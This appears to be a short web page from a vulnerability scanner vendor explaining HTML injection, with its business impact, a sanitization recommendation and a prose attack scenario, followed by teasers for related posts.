HTML Injection

Description

This vulnerability occurs when user input is not correctly sanitized and the output is not encoded.

Bussines Impact

A successful injection will allow the attacker to send a malicious HTML page to a victim.

Recommendation

Look for HTML elements in the incoming HTTP stream that contains the user input. And simply removes any HTML-syntax substrings (like tags and links) from any user-supplied text.

More Details

OWASP Attack scenario A possible attack scenario is demonstrated below: Attacker discovers injection vulnerability and decides to use an HTML injection attack Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email The user visits the page due to the page being located within a trusted domain The attacker’s injected HTML is rendered and presented to the user asking for a username and password The user enters a username and password, which are both sent to the attackers server

Reference

https://www.imperva.com/learn/application-security/html-injection/

What is Kayran

Kayran scanner is helping all businesses, both SMBs and enterprises, to test their online assets and products for over 9000 vulnerabilities.Kayran’s mission is to make

Read More »

SQLI to RCE

How to preform SQLI TO RCE? One of the most interesting and important things about any site is the database. So, it’s important to protect

Read More »